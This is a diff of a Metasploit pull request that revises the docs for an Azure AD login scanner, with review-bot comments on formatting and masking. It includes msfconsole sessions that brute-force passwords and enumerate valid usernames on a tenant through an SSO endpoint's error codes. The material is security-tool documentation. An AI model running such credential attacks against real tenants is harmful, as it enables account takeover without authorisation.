Land #15900, Update Azure AD Login Scanner Docs
commit bfea5137b9
@ -1,10 +1,10 @@
## Vulnerable Application
The Microsoft Azure AD service has a vulnerable endpoint that delivers an error-code based response
to specific authentication requests in XML. The endpoint, when passed the correct credentials,
will respond with a DesktopSsoToken that can be used to authenticate to Azure AD. When
the authentication is unsuccessful, the error code that is returned can be used to discover the
validity of usernames in the target tenant.
The Microsoft Azure AD SSO service has a vulnerable endpoint that delivers an error-code based
response to specific authentication requests in XML. The endpoint, when passed the correct
credentials, will respond with a DesktopSsoToken that can be used to authenticate to Azure AD.
When the authentication is unsuccessful, the error code that is returned can be used to discover
the validity of usernames in the target tenant.
This module also reports credentials to the credentials database when they are discovered.
## Verification Steps
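Review bot: the rewritten paragraph only adds "SSO" to the service name and rewraps the lines, so all five lines show as changed; the more useful documentation fix is still missing: the text says the returned error code "can be used to discover the validity of usernames" but never lists which codes the module maps to "valid user" and "not a valid user", even though the scenario output later in this file ("[-] example.com\k0pak4 is not a valid user", "[+] Password password is invalid but example.com\**** is valid!") depends on exactly that mapping. A short list of the interpreted error codes after this paragraph would let a reader check the module's verdicts. Minor: "error-code based" should be hyphenated as "error-code-based".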
@ -44,10 +44,14 @@ A file with passwords, one per line.
## Scenarios
### Azure AD Tenants with SSO Enabled
If a tenant's domain is known, you can use this module for username and password brute-forcing.
Specific target output replaced with *s so as not to disclose information
```msf6 > use auxiliary/scanner/http/azure_ad_login
```
msf6 > use auxiliary/scanner/http/azure_ad_login
msf6 auxiliary(scanner/http/azure_ad_login) > set USER_FILE /home/kali/users.txt
USER_FILE => /home/kali/users.txt
msf6 auxiliary(scanner/http/azure_ad_login) > set PASS_FILE /home/kali/pass.txt
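Review bot: the fence fix is correct (the old line fused "```" onto "msf6 > use auxiliary/scanner/http/azure_ad_login"), but the scenario sentence "If a tenant's domain is known, you can use this module for username and password brute-forcing." leaves the SSO precondition only in the heading "### Azure AD Tenants with SSO Enabled"; state it in the sentence as well, e.g. "If a tenant's domain is known and the tenant has SSO enabled, ...", so a reader skimming the steps knows why a run can return nothing. Also end "Specific target output replaced with *s so as not to disclose information" with a period.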
@ -69,11 +73,13 @@ msf6 auxiliary(scanner/http/azure_ad_login) > run
[+] Login example.com\****:****** is valid!
[+] Desktop SSO Token: *******************************************
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed```
[*] Auxiliary module execution completed
```
If a tenant's domain is known, you can enumerate their usernames
```msf6 > use auxiliary/scanner/http/azure_ad_login
```
msf6 > use auxiliary/scanner/http/azure_ad_login
msf6 auxiliary(scanner/http/azure_ad_login) > set USER_FILE /home/kali/users.txt
USER_FILE => /home/kali/users.txt
msf6 auxiliary(scanner/http/azure_ad_login) > set PASSWORD password
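Review bot: the lead-in "If a tenant's domain is known, you can enumerate their usernames" is missing its period, and since this run combines USER_FILE with "set PASSWORD password", one sentence should say that enumeration works by submitting that single password for every user in the list, so the reader understands why the output reports the password as invalid while the username is still confirmed. The fused-fence fix at "[*] Auxiliary module execution completed```" and at the start of the second block is the right change.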
@ -86,11 +92,5 @@ msf6 auxiliary(scanner/http/azure_ad_login) > run
[-] example.com\k0pak4 is not a valid user
[+] Password password is invalid but example.com\**** is valid!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed```
## Version and OS
Tested against current Azure AD tenants.
## References
- https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/
- https://github.com/treebuilder/aad-sso-enum-brute-spray
[*] Auxiliary module execution completed
```
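Review bot: "[-] example.com\k0pak4 is not a valid user" still prints an unmasked username even though the doc states that "Specific target output replaced with *s so as not to disclose information"; mask it like the other entries ("example.com\****") before landing. Separately, this hunk removes "## Version and OS" ("Tested against current Azure AD tenants.") together with "## References"; the two reference URLs reappear in the module's 'References' array in the following hunk, but the tested-against note has no replacement and should be kept unless it is recorded elsewhere.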
@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://raxis.com/blog/metasploit-azure-ad-login'],
[ 'URL', 'https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/'],
[ 'URL', 'https://github.com/treebuilder/aad-sso-enum-brute-spray'],
],
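Review bot: the three reference entries are written as "[ 'URL', '...']", with a space after the opening bracket but none before the closing one; RuboCop's Layout/SpaceInsideArrayLiteralBrackets (no_space by default) rejects that form, so normalize all three to "['URL', '...']" before landing. Moving the URLs that this change drops from the doc's "## References" section into the module's 'References' array keeps the two in sync, which is the right place for them.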